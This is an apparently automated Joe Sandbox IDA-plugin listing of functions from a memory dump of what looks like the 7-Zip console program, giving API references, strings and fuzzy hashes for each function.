Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: CurrentInfoProcessSystem
String ID:
API String ID: 1098911721-0
Opcode ID: 3fe78990de1b082a0b60084bcba32a5828cb8e3291c47789f548cb5e73abf302
Instruction ID: bf2204e8b2d779e86e239ba3ba7ed7f9e8150ba6e241014c31bba247b275d1b1
Opcode Fuzzy Hash: 3fe78990de1b082a0b60084bcba32a5828cb8e3291c47789f548cb5e73abf302
Instruction Fuzzy Hash: 92E0ED6762449483CA70DB08E952B69A364F794755FC09611E78D82E19DF2DC6548F00

Function 009BD690 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34068706c2d5e8e26acb18a5d787bd8c28d1e0f249bc181dd9bcec1cf4fba99d
Instruction ID: 28c2724fb23dbda97642d8b7dd185ece33fef4764bb070aebcff4110c2f5ae3c
Opcode Fuzzy Hash: 34068706c2d5e8e26acb18a5d787bd8c28d1e0f249bc181dd9bcec1cf4fba99d
Instruction Fuzzy Hash: 2CE042F290A2058FD3D98F6AD4412587EE4F748795B60C13FA608D3301D37581888F92

Function 00990C24 Relevance: 97.9, APIs: 78, Instructions: 364COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00990CC6
free.MSVCRT ref: 00990CD0
free.MSVCRT ref: 00990CE6
free.MSVCRT ref: 00990CF0

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 9cbdc30e6d0b5ea00b42a6c34bff6f946b52da21b37e4cfe8bd3163259cd7e86
Instruction ID: 9cc9ff7c842044f49f5c09ada6fa6473447d7caa67160939b076c4b44a8beb1e
Opcode Fuzzy Hash: 9cbdc30e6d0b5ea00b42a6c34bff6f946b52da21b37e4cfe8bd3163259cd7e86
Instruction Fuzzy Hash: 0FD1C22326D58181DA60FF36E49176FA720F7C2784F909152FB9E93B39DE28C946CB14

Function 009A2A7D Relevance: 44.0, APIs: 35, Instructions: 257COMMON

Download Yara Rule

APIs

Part of subcall function 0099E7A0: free.MSVCRT ref: 0099E81E
Part of subcall function 0099E7A0: free.MSVCRT ref: 0099E828
Part of subcall function 0099E7A0: free.MSVCRT ref: 0099E832
Part of subcall function 0099E7A0: free.MSVCRT ref: 0099E83C

free.MSVCRT ref: 009A2AD7
free.MSVCRT ref: 009A2AE2
free.MSVCRT ref: 009A2AEB
free.MSVCRT ref: 009A2AF6
free.MSVCRT ref: 009A2B04
free.MSVCRT ref: 009A2B26
free.MSVCRT ref: 009A2B2F
free.MSVCRT ref: 009A2B3D
free.MSVCRT ref: 009A2B48
free.MSVCRT ref: 009A2C3E
free.MSVCRT ref: 009A2C49
free.MSVCRT ref: 009A2C52
free.MSVCRT ref: 009A2C5D
free.MSVCRT ref: 009A2C6B
free.MSVCRT ref: 009A2C8D
free.MSVCRT ref: 009A2C96
free.MSVCRT ref: 009A2CA4
free.MSVCRT ref: 009A2CAF
free.MSVCRT ref: 009A2CE3
free.MSVCRT ref: 009A2CEE
free.MSVCRT ref: 009A2CF7
free.MSVCRT ref: 009A2D08
free.MSVCRT ref: 009A2D16
free.MSVCRT ref: 009A2D3D
free.MSVCRT ref: 009A2D46
free.MSVCRT ref: 009A2D54
free.MSVCRT ref: 009A2D5F
free.MSVCRT ref: 009A2D73
free.MSVCRT ref: 009A2D85
free.MSVCRT ref: 009A2D93
free.MSVCRT ref: 009A2DBA
free.MSVCRT ref: 009A2DC3
free.MSVCRT ref: 009A2DD1
free.MSVCRT ref: 009A2DDC
free.MSVCRT ref: 009A2DEA

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 28ab6cdc9f263cf9404c085a8059b8072311b560ecc5f73d0aa5210d99d2189d
Instruction ID: 13f21419441e48a086a22ff36983a4cd55f5beb80e2e1d5a3bf8b7f1ea0499be
Opcode Fuzzy Hash: 28ab6cdc9f263cf9404c085a8059b8072311b560ecc5f73d0aa5210d99d2189d
Instruction Fuzzy Hash: 9D91393321AA8486CA24EF36E4A4B6E6764F7CBF85F46A462DB4E53711CF38C446C714

Function 00991DB4 Relevance: 41.7, APIs: 33, Instructions: 418COMMON

Download Yara Rule

APIs

Part of subcall function 00973314: memmove.MSVCRT ref: 00973339

Part of subcall function 00972130: malloc.MSVCRT ref: 00972134
Part of subcall function 00972130: _CxxThrowException.MSVCRT ref: 0097214F

free.MSVCRT ref: 00991EAE
free.MSVCRT ref: 00991EB6
free.MSVCRT ref: 00991EC4
free.MSVCRT ref: 00991EF2
free.MSVCRT ref: 00991EFA
free.MSVCRT ref: 00991F08
free.MSVCRT ref: 00991F40
free.MSVCRT ref: 00991F48
free.MSVCRT ref: 00991F5B
free.MSVCRT ref: 00991FDE
free.MSVCRT ref: 00992010
free.MSVCRT ref: 00992018
free.MSVCRT ref: 00992026
free.MSVCRT ref: 009920E2
free.MSVCRT ref: 00992114
free.MSVCRT ref: 0099211C
free.MSVCRT ref: 0099212A
free.MSVCRT ref: 0099218F
free.MSVCRT ref: 00992197
free.MSVCRT ref: 009921A5
free.MSVCRT ref: 009921E1
free.MSVCRT ref: 009921E9
free.MSVCRT ref: 009921F7
free.MSVCRT ref: 00992235
free.MSVCRT ref: 0099223D
free.MSVCRT ref: 0099224B

Part of subcall function 00990554: free.MSVCRT ref: 009905FD
Part of subcall function 00990554: free.MSVCRT ref: 00990607
Part of subcall function 00990554: free.MSVCRT ref: 00990612

free.MSVCRT ref: 009922CD
free.MSVCRT ref: 009922D5
free.MSVCRT ref: 009922E3
free.MSVCRT ref: 009923A0
free.MSVCRT ref: 009923A8
free.MSVCRT ref: 009923B6
free.MSVCRT ref: 009923C4

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$ExceptionThrowmallocmemmove
String ID:
API String ID: 3352498445-0
Opcode ID: 4d8d899cfb035eb7cde2558026b141a486167347833140dff5bfb46b77e2efc0
Instruction ID: 8072e47d3ec676959af99f21b0b45a28f7a4bb618bc8e42bfd332018497a3075
Opcode Fuzzy Hash: 4d8d899cfb035eb7cde2558026b141a486167347833140dff5bfb46b77e2efc0
Instruction Fuzzy Hash: 2FE1B43371869096CE30FF1AE4812ADA764F3C6BD0F898126EF9D57719DE68C886C750

Function 009805A0 Relevance: 40.7, APIs: 25, Strings: 2, Instructions: 209COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 00980624
memmove.MSVCRT ref: 0098070D
free.MSVCRT ref: 009807AA
free.MSVCRT ref: 009807B8
free.MSVCRT ref: 009807C5
free.MSVCRT ref: 009807D2
free.MSVCRT ref: 009807DF
free.MSVCRT ref: 009807EC
free.MSVCRT ref: 009807F9
free.MSVCRT ref: 00980806
free.MSVCRT ref: 00980810
free.MSVCRT ref: 0098081B
free.MSVCRT ref: 00980843

Part of subcall function 0097339C: free.MSVCRT ref: 009733D7
Part of subcall function 0097339C: memmove.MSVCRT(00000000,?,?,00000000,009710A8), ref: 009733F2

free.MSVCRT ref: 0098084D

Part of subcall function 00973274: memmove.MSVCRT ref: 009732AC

free.MSVCRT ref: 00980859
free.MSVCRT ref: 00980867
free.MSVCRT ref: 00980874
free.MSVCRT ref: 00980881
free.MSVCRT ref: 0098088E
free.MSVCRT ref: 0098089B
free.MSVCRT ref: 009808A8
free.MSVCRT ref: 009808B5
free.MSVCRT ref: 009808BF
free.MSVCRT ref: 009808CA

Part of subcall function 00973404: free.MSVCRT ref: 00973431
Part of subcall function 00973404: memmove.MSVCRT ref: 0097344C

Part of subcall function 0097FBE4: memmove.MSVCRT ref: 0097FC3F

_CxxThrowException.MSVCRT ref: 00980900

Strings

incorrect update switch command, xrefs: 009808E3
pqrxyzw, xrefs: 00980656

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove$ExceptionThrow
String ID: incorrect update switch command$pqrxyzw
API String ID: 3957182552-3922825594
Opcode ID: 7c7c3e7fd9314440e1a1777af8ec9796aa83228940c07231adba96d4221eb7b0
Instruction ID: d9a48c3ee61922db76e1bc9bd38c79336dd4b49f57fb64ab17aeb9de8685d1fb
Opcode Fuzzy Hash: 7c7c3e7fd9314440e1a1777af8ec9796aa83228940c07231adba96d4221eb7b0
Instruction Fuzzy Hash: 1D81B633629584D2CB60FF16D8917AE7324F7C5B84F818122EB9E47765DE38C94ACB50

Function 00975D18 Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 328COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 00975D69
free.MSVCRT ref: 00975DB7
free.MSVCRT ref: 00975DBF
wcscmp.MSVCRT ref: 00975E09
wcscmp.MSVCRT ref: 00975E63
wcscmp.MSVCRT ref: 00975E77
free.MSVCRT ref: 00975F32
free.MSVCRT ref: 00975F3A
memmove.MSVCRT ref: 00975F4F
free.MSVCRT ref: 0097603B
free.MSVCRT ref: 00976046
free.MSVCRT ref: 0097608D
free.MSVCRT ref: 00976095

Part of subcall function 00973314: memmove.MSVCRT ref: 00973339

Part of subcall function 0097B8F0: memmove.MSVCRT ref: 0097B932
Part of subcall function 0097B8F0: free.MSVCRT ref: 0097B93A

free.MSVCRT ref: 009760F3

Part of subcall function 009759E0: free.MSVCRT ref: 00975ABB
Part of subcall function 009759E0: free.MSVCRT ref: 00975ACE
Part of subcall function 009759E0: free.MSVCRT ref: 00975AD6
Part of subcall function 009759E0: memmove.MSVCRT ref: 00975AEE

free.MSVCRT ref: 009761A8
free.MSVCRT ref: 009761B0
free.MSVCRT ref: 009761BF
free.MSVCRT ref: 009761CA
free.MSVCRT ref: 009761EE
free.MSVCRT ref: 009761F6
free.MSVCRT ref: 00976202

Strings

Empty file path, xrefs: 00975D53

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove$wcscmp$ExceptionThrow
String ID: Empty file path
API String ID: 462375450-1562447899
Opcode ID: 324205b252e1547a146404fd684db01b8975b469ffccedc29f4d10e25dad08a8
Instruction ID: f8d730960e32be85297569de68a3b4970dcb7c16b77ade321d9d42c372b45787
Opcode Fuzzy Hash: 324205b252e1547a146404fd684db01b8975b469ffccedc29f4d10e25dad08a8
Instruction Fuzzy Hash: 6FD1E333218A8096CB60EF26E48039EB764FBC5B94F858115EF9E47B69DF78C945CB00

Function 0097A224 Relevance: 37.8, APIs: 22, Strings: 3, Instructions: 317COMMON

Download Yara Rule

Strings

\\?\, xrefs: 0097A3ED, 0097A4CF
\\?\UNC\, xrefs: 0097A527, 0097A66C
\, xrefs: 0097A363

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID:
String ID: \$\\?\$\\?\UNC\
API String ID: 0-1962706685
Opcode ID: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
Instruction ID: 5c70b32be224fc4311884bde1977f358c9c769f461c683bcf22c888852e36982
Opcode Fuzzy Hash: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
Instruction Fuzzy Hash: 45B15E2321964090CE20FF22D45266EA724FBD2BD4F84D112FB4E4777ADF69C986DB12

Function 00971C58 Relevance: 31.5, APIs: 25, Instructions: 294COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00971C98
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00971CB9

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 4011904a981b9cc7d5110702b517e72b43359cd785bba75f51c38677a1bb3970
Instruction ID: d9ef854ed45ef9acdcc1bf939416f4c30e1383f63cd439242b1b185b910e2afb
Opcode Fuzzy Hash: 4011904a981b9cc7d5110702b517e72b43359cd785bba75f51c38677a1bb3970
Instruction Fuzzy Hash: 9EA1922365864082CB20EF19E49166EB725FBD67D0F94D112FB9E47B69DF2CC886CB10

Function 009B7F50 Relevance: 30.2, APIs: 24, Instructions: 154COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009B7FA0
free.MSVCRT ref: 009B7FA8
free.MSVCRT ref: 009B7FB8
free.MSVCRT ref: 009B7FC4
free.MSVCRT ref: 009B7FF6
free.MSVCRT ref: 009B7FFE
free.MSVCRT ref: 009B800E
free.MSVCRT ref: 009B8026
free.MSVCRT ref: 009B8058
free.MSVCRT ref: 009B8061
free.MSVCRT ref: 009B8069
free.MSVCRT ref: 009B8079
free.MSVCRT ref: 009B8085
free.MSVCRT ref: 009B80B7
free.MSVCRT ref: 009B80BF
free.MSVCRT ref: 009B80CF
free.MSVCRT ref: 009B8108
free.MSVCRT ref: 009B8110
free.MSVCRT ref: 009B811D
free.MSVCRT ref: 009B8127
free.MSVCRT ref: 009B8131
free.MSVCRT ref: 009B815D
free.MSVCRT ref: 009B8165
free.MSVCRT ref: 009B8172

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: a5da411e75573f0648736714f517a5bbb6ba3fc978bf78ef7329a5e2f6ab8de4
Instruction ID: c11c957c1ac407ab9bf7990c50f458b1504726778f48436ec32b103fe2ce8341
Opcode Fuzzy Hash: a5da411e75573f0648736714f517a5bbb6ba3fc978bf78ef7329a5e2f6ab8de4
Instruction Fuzzy Hash: 14513127625A8489C711EF32D9513AA6325F7D6FE8F994271DE2D1B759DE20C802C360

Function 009B6C04 Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 160COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009B6C87

Part of subcall function 00972670: fputs.MSVCRT ref: 0097268F

fputs.MSVCRT ref: 009B6C4F

Part of subcall function 009B6B3C: fputs.MSVCRT ref: 009B6B7C
Part of subcall function 009B6B3C: free.MSVCRT ref: 009B6BAE
Part of subcall function 009B6B3C: fputs.MSVCRT ref: 009B6BCC

fputs.MSVCRT ref: 009B6D13
fputs.MSVCRT ref: 009B6D3D
fputs.MSVCRT ref: 009B6D6D
fputs.MSVCRT ref: 009B6D87
fputc.MSVCRT ref: 009B6D9A
free.MSVCRT ref: 009B6E3A
free.MSVCRT ref: 009B6E72

Part of subcall function 00972300: fputc.MSVCRT ref: 00972311

Strings

Everything is Ok, xrefs: 009B6D0C
WARNINGS for files:, xrefs: 009B6D36
WARNING: Cannot open , xrefs: 009B6D66
Scan WARNINGS: , xrefs: 009B6C80
Scan WARNINGS for files and folders:, xrefs: 009B6C48
Error:, xrefs: 009B6E50
file, xrefs: 009B6D80

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$free$fputc
String ID: Error:$ file$Everything is Ok$Scan WARNINGS for files and folders:$Scan WARNINGS: $WARNING: Cannot open $WARNINGS for files:
API String ID: 2662072562-1527772849
Opcode ID: da4e118f9d486780fcc46832e40a27d855b0a713e45ff0d8968e49b5411b90f1
Instruction ID: fbfc4be342d4e647b4151c457dd5e2e7977ba5d059cfad3257f7e23b1baddfe1
Opcode Fuzzy Hash: da4e118f9d486780fcc46832e40a27d855b0a713e45ff0d8968e49b5411b90f1
Instruction Fuzzy Hash: D3517D7731450086DE30EB26EA953AE7326FBC4BE4F448126EE5E076A5DF2CD945C340

Function 00991988 Relevance: 27.7, APIs: 22, Instructions: 211COMMON

Download Yara Rule

APIs

Part of subcall function 00973314: memmove.MSVCRT ref: 00973339

free.MSVCRT ref: 00991A13
free.MSVCRT ref: 00991A73
free.MSVCRT ref: 00991AA1
free.MSVCRT ref: 00991AA9
free.MSVCRT ref: 00991AB7
free.MSVCRT ref: 00991AC2
free.MSVCRT ref: 00991C8F
free.MSVCRT ref: 00991C9A
free.MSVCRT ref: 00991CA7
free.MSVCRT ref: 00991CB4

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: 487434742999afad6c6a49a55d089b6f01de136bf747d36331bc54ee911b7c32
Instruction ID: e660b54260404f9031751b905419b5a477bbe9a14a7607f35b58891d442dd779
Opcode Fuzzy Hash: 487434742999afad6c6a49a55d089b6f01de136bf747d36331bc54ee911b7c32
Instruction Fuzzy Hash: B771A723219A8191DE20EF26E89139EA721F7C67D0F549122FF9E57B6DDF28C846C710

Function 009A187D Relevance: 25.2, APIs: 20, Instructions: 214COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009A187D

Part of subcall function 00972130: malloc.MSVCRT ref: 00972134
Part of subcall function 00972130: _CxxThrowException.MSVCRT ref: 0097214F

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ExceptionThrowfreemalloc
String ID:
API String ID: 2861928636-0
Opcode ID: fc3a67dbef3549b613e96df0c000b572b71572800cf79d164be4322c4d64f1de
Instruction ID: 5c3e68976609fa2b7531c99f6fc1e370c1eff1deb558ff33277e8c5cff150f5b
Opcode Fuzzy Hash: fc3a67dbef3549b613e96df0c000b572b71572800cf79d164be4322c4d64f1de
Instruction Fuzzy Hash: D0812637219AC481CA60EF26E460BAF6768F7DBB84F519066DB8E53B15CF38C446CB44

Function 009B72C8 Relevance: 25.1, APIs: 20, Instructions: 81COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009B72DB
free.MSVCRT ref: 009B730D
free.MSVCRT ref: 009B7315
free.MSVCRT ref: 009B731D
free.MSVCRT ref: 009B732D
free.MSVCRT ref: 009B7339
free.MSVCRT ref: 009B7345
free.MSVCRT ref: 009B7351
free.MSVCRT ref: 009B735D
free.MSVCRT ref: 009B7369
free.MSVCRT ref: 009B7375
free.MSVCRT ref: 009B7381
free.MSVCRT ref: 009B738D
free.MSVCRT ref: 009B7399
free.MSVCRT ref: 009B73A2
free.MSVCRT ref: 009B73AB
free.MSVCRT ref: 009B73B4
free.MSVCRT ref: 009B73E9
free.MSVCRT ref: 009B73F1
free.MSVCRT ref: 009B73F9

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 604b93e9740048c82800e9d74cf7720333369c55d8207d772f7bb48edf82253e
Instruction ID: 7b8e45540b77b6d03592dcf12a1fb539e3902dfe3ab4aec2b6b10fa7787afd4c
Opcode Fuzzy Hash: 604b93e9740048c82800e9d74cf7720333369c55d8207d772f7bb48edf82253e
Instruction Fuzzy Hash: C631C52362998085CA11BF77DD513AC6320FBC2F94F998172AF2E5B369CE20C842C364

Function 009ADCB0 Relevance: 22.8, APIs: 10, Strings: 5, Instructions: 323COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009ADE77
free.MSVCRT ref: 009ADE82
free.MSVCRT ref: 009ADE8C

Part of subcall function 0097AEBC: memmove.MSVCRT ref: 0097AEE7

free.MSVCRT ref: 009ADF0B

Strings

2, xrefs: 009ADFF8
Z, xrefs: 009ADEBC
?, xrefs: 009ADF66
?, xrefs: 009AE024
3, xrefs: 009AE0BC

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove
String ID: 2$3$?$?$Z
API String ID: 1534225298-3338962022
Opcode ID: 84abab613373cf7922060763a3c287b9f684fa76ebb682cbcf5688f653a5ccb0
Instruction ID: a03b0e470efda5792cc341c19872be2a8dcf6fe0384c62e92a2aea8ad8f2c622
Opcode Fuzzy Hash: 84abab613373cf7922060763a3c287b9f684fa76ebb682cbcf5688f653a5ccb0
Instruction Fuzzy Hash: 96C1C633329A8096CB30EB25D4906AFB725F7D6B84F508512EB9E43B69DE38C945CB41

Function 00983AFC Relevance: 21.4, APIs: 17, Instructions: 169COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00983B4A
free.MSVCRT ref: 00983B52
free.MSVCRT ref: 00983B62
free.MSVCRT ref: 00983B6E
free.MSVCRT ref: 00983BA0
free.MSVCRT ref: 00983BA8
free.MSVCRT ref: 00983BB8
free.MSVCRT ref: 00983BC4
free.MSVCRT ref: 00983BF6
free.MSVCRT ref: 00983BFE
free.MSVCRT ref: 00983C0E
free.MSVCRT ref: 00983C53
free.MSVCRT ref: 00983C5B
free.MSVCRT ref: 00983C6B
free.MSVCRT ref: 00983C9E
free.MSVCRT ref: 00983CDE
free.MSVCRT ref: 00983CE8

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
